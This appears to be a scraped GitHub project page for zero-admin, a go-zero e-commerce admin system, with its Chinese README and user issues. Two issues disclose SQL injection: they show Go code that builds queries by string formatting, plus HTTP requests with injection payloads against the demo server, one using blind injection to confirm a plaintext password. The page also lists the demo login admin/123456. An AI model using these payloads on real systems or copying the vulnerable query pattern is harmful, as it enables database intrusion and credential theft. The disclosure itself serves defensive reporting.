Git Product home page Git Product logo

zero-admin's Introduction

Zero-Admin 电商系统

注:ORM持久层已经整体切换成gorm 后端接口改动较大,前端正在重新适配中

基础代码生成 https://github.com/feihua/generate-code

go run main.go golang zero --dsn "root:123456@tcp(127.0.0.1:3306)/zero-sys" --tableNames sys_ --prefix sys_  --rpcClient sysclient --author liufeihua

Zero-Admin 是一套基于 go-zero 框架实现的电商系统,采用 Docker 容器化部署,包含前台商城系统和后台管理系统。

前台商城系统

模块介绍

  1. 首页门户: 提供用户访问网站的入口,展示热门商品和推荐信息。

  2. 商品推荐: 根据用户的历史行为和个人喜好,推荐个性化商品。

  3. 商品搜索: 强大的商品搜索功能,支持关键字搜索、筛选等。

  4. 商品展示: 以优雅的方式展示商品信息,包括详细描述、价格、评价等。

  5. 购物车: 用户可以将喜欢的商品添加到购物车,方便批量购买。

  6. 订单流程: 提供完整的订单流程,包括下单、支付、发货、收货等环节。

  7. 会员中心: 用户可以管理个人信息、查看订单状态、积分等。

  8. 帮助中心: 提供用户常见问题解答、售后政策等信息。

技术栈

  • go-zero 框架实现,高性能、易扩展。
  • 前端采用现代化的前端框架,例如 React 或 Vue。
  • Docker 容器化部署,方便快捷。

后台管理系统

模块介绍

  1. 商品管理: 管理商品信息,包括添加、编辑、删除商品。

  2. 订单管理: 实时监控订单状态,支持订单发货、取消等操作。

  3. 会员管理: 管理用户信息,包括注册用户、会员等级等。

  4. 促销管理: 管理营销活动,例如满减、打折等。

  5. 运营管理: 管理广告、推广等运营活动。

  6. 内容管理: 管理网站内容,包括公告、资讯等。

  7. 权限管理: 管理系统用户权限,确保安全性。

  8. 设置: 系统配置,包括支付方式、物流信息等。

技术栈

  • go-zero 框架提供后台接口支持。
  • 使用现代化的前端框架进行界面开发。
  • 数据库采用 xxx。
  • Docker 容器化部署,方便管理和维护。

文档地址

https://feihua.github.io/ 正在完善

zero-admin-ui是后台的pc管理端是一个基于react实现的管理后台

flutter_mall是zero-admin的app端是一个Flutter的电商实战项目,包括首页、列表页、详细页、购物车页、会员中心和支付(支付对接的是支付宝)

zero-pc-web 是 zero-admin 的网页端zero-pc-web 是一个基于 React 框架实现的 web 端电商系统(预览地址http://110.41.179.89/pc/)

android版本

android版本体验地址 flutter-mall-app

项目模板

zero-admin-template(只包含基础的rbac权限)

1.项目预览

预览地址http://110.41.179.89/mall 账号:admin 密码: 123456

注:演示账号部分功能修改删除权限未开放。

支付模块:(独立与zero-admin) 参考Jeepaydax-pay

1.1用户

image-20210427204637691

1.1.1新增用户

image-20210427204434301

1.2角色

图片

1.2.1分配权限

image-20210427204555834

1.3菜单

图片

1.4机构

图片

1.5字典

image-20210427204811263

1.6日志

image-20210427204848192

1.7职位列表

image-20210427204732978

2.感谢

go-zero

mall

zero-admin's People

Contributors

dugudotxin avatar feihua avatar guohuixixi avatar loyalpartner avatar p18420199451 avatar yh-zero avatar ywanbing avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

xiongdi9456 zhaolei0518 cuczhangyi wuchunfu loocor gaodihu kennylixi chree188 erichen86 loyalpartner lynzhai dawei-gege flyowl simman angerymen nacle830213 zhoujin960157994 halcyondaysssss arbullzhang zzjrkt golango-cn bingws baiqr zhaokai5520 coien1983 2008shishi lwl-soft-go stonehao njdxd tapide honeyandroid hxoreyer lovepepsi ifishnet zhuyu caesarchan simplelovecs huanhuande quququcc andonglong changzhi777 alanlv nndaaa simpleliyu mingqi420 seagulltoad 78182648 chutonghai damonxiong lzmai shaohongwu chendongming0625 wooodhead keeptrying anyone0034 archerzdip vivicai ljh562778946-code panjm scorpio69t jy1985429 gk4589210 panjf2008 cgc1983 jadegeek tuowt billmi sasachen caohui123 feiliu3k yumenghu niuernihao xuhande deegar mycat2022 ldc1481 royswale dannyzml forgeries lzwcyd gerardhb jackjie2016 wuyoushe athmoon yshanchui gkuanine pockees zhaoyadong00 xulongnr xiayexing cogidoo2015 longjinbing c2cn mazikai002 kotlin2018 menyu1113 gonhon platformcn blessli andyzhang420

zero-admin's Issues

[bug] sql 注入

sql 注入

此处代码对应的路由是 /api/sys/dict/list

zero-admin/rpc/model/sysmodel/sysdictmodel.go

Lines 36 to 58 in 744dccf

func (m *customSysDictModel) FindAll(ctx context.Context, in *sysclient.DictListReq) (*[]SysDict, error) {
where := "1=1"
if len(in.Type) > 0 {
where = where + fmt.Sprintf(" AND type like '%%%s%%'", in.Type)
}
if len(in.Label) > 0 {
where = where + fmt.Sprintf(" AND label like '%%%s%%'", in.Label)
}
if in.DelFlag != 2 {
where = where + fmt.Sprintf(" AND del_flag = %d", in.DelFlag)
}
query := fmt.Sprintf("select %s from %s where %s limit ?,?", sysDictRows, m.table, where)
var resp []SysDict
err := m.conn.QueryRows(&resp, query, (in.Current-1)*in.PageSize, in.PageSize)
switch err {
case nil:
return &resp, nil
case sqlc.ErrNotFound:
return nil, ErrNotFound
default:
return nil, err
}
} 

POST http://110.41.179.89/api/sys/dict/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 77
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/dict/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":1,"type":"1919810%' OR id = 2 AND '114514' like '%1"}

[bug] sql 注入获取其他账号密码

sql 注入获取其他账号密码

此处代码对应的路由是 /api/sys/user/list

zero-admin/rpc/model/sysmodel/sysusermodel.go

Lines 61 to 84 in 744dccf

func (m *customSysUserModel) FindAll(ctx context.Context, in *sysclient.UserListReq) (*[]SysUserList, error) {
where := "1=1"
if len(in.Name) > 0 {
where = where + fmt.Sprintf(" AND sys_user.name like '%%%s%%'", in.Name)
}
if len(in.Mobile) > 0 {
where = where + fmt.Sprintf(" AND sys_user.mobile like '%%%s%%'", in.Mobile)
}
if in.Status != 2 {
where = where + fmt.Sprintf(" AND sys_user.status = %d", in.Status)
}
where = where + fmt.Sprint(" ORDER BY create_time DESC")
query := fmt.Sprintf("select sys_user.*, ifnull(sj.job_name,'') as job_name, ifnull(sd.name ,'')as dept_name, ifnull(sys_role.name,'') as role_name,ifnull(sys_role.id ,'0')as role_id from sys_user left join sys_user_role sur on sys_user.id = sur.user_id left join sys_role on sur.role_id = sys_role.id left join sys_job sj on sys_user.job_id = sj.id left join sys_dept sd on sys_user.dept_id = sd.id where %s limit ?,?", where)
var resp []SysUserList
err := m.conn.QueryRows(&resp, query, (in.Current-1)*in.PageSize, in.PageSize)
switch err {
case nil:
return &resp, nil
case sqlc.ErrNotFound:
return nil, ErrNotFound
default:
return nil, err
}
}

  • 这段代码查的是带有账号密码字段的数据表,而且存在 sql 注入
  • 数据库密码明文存储

那就可以使用布尔盲注挨个匹配出其他账号的密码明文

已知 demo 网站 admin 密码是 123456
此处做一个简单的注入判断

sys_user.username like '%admin' AND sys_user.passsword like '124%' 无匹配

POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 75
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '124"}

sys_user.username like '%admin' AND sys_user.passsword like '123456%' 匹配成功

POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 78
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '123456"}

预览网站登录不了 

{userName: "admin", password: "123456", autoLogin: true, type: "account"}

返回

rpc error: code = Unknown desc = 用户密码不正确

数据库的日志输问题 

func (w Writer) Printf(format string, args ...interface{}) {
	logx.Infof(format, args)
}

应该改成

func (w Writer) Printf(format string, args ...interface{}) {
	logx.Infof(format, args...)
}

你好想请问下项目命名的规范

有看到过go-zero,建议的文件命名规范是小写不要加_
我看到本项目,大部分目录和文件名的命名都是多个单词没有分割,全部用小写,这样做的目的是什么,没有分隔符看着会有一点怪
另外看到有两个目录front-api,common/errorx又是这样命名的.

front-api 目录作用是什么?

通过sh脚本,我看通过docker启动了api服务,但font-api 服务没有启动,请问下这个目录下的服务的用处是什么

项目介绍

有没有哪位老哥大致跑过作者大大的这个项目,能简单说下业务结构和项目结构吗

【bug】sms编译失败

执行docker build -t sms:v1 -f rpc/sms/Dockerfile .时报错:

#0 212.4 # zero-admin/rpc/sms/internal/logic/couponproductcategoryrelationservice
#0 212.4 rpc/sms/internal/logic/couponproductcategoryrelationservice/couponproductcategoryrelationlistlogic.go:27:79: in.Current undefined (type *smsclient.CouponProductCategoryRelationListReq has no field or method Current)
#0 212.4 rpc/sms/internal/logic/couponproductcategoryrelationservice/couponproductcategoryrelationlistlogic.go:27:91: in.PageSize undefined (type *smsclient.CouponProductCategoryRelationListReq has no field or method PageSize)
#0 212.4 # zero-admin/rpc/sms/internal/logic/couponproductrelationservice
#0 212.4 rpc/sms/internal/logic/couponproductrelationservice/couponproductrelationlistlogic.go:27:71: in.Current undefined (type *smsclient.CouponProductRelationListReq has no field or method Current)
#0 212.4 rpc/sms/internal/logic/couponproductrelationservice/couponproductrelationlistlogic.go:27:83: in.PageSize undefined (type *smsclient.CouponProductRelationListReq has no field or method PageSize)
------
Dockerfile:13
--------------------
  11 |     RUN sh -c "[ -f go.mod ]" || exit
  12 |     COPY rpc/sms/etc /app/etc
  13 | >>> RUN go build -ldflags="-s -w" -o /app/sms rpc/sms/sms.go
  14 |     
  15 |     
--------------------
ERROR: failed to solve: process "/bin/sh -c go build -ldflags=\"-s -w\" -o /app/sms rpc/sms/sms.go" did not complete successfully: exit code: 1

原因是这个提交 4c14598 将zero-admin\rpc\sms\smsclient\sms.pb.go中CouponProductCategoryRelationListReq中的Current、PageSize字段去除了,但是以下2处仍然依赖了Current、PageSize字段。

  • zero-admin\rpc\sms\internal\logic\couponproductcategoryrelationservice\couponproductcategoryrelationlistlogic.go中的方法CouponProductCategoryRelationList
  • zero-admin\rpc\sms\internal\logic\couponproductrelationservice\couponproductrelationlistlogic.go中的方法CouponProductRelationList

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.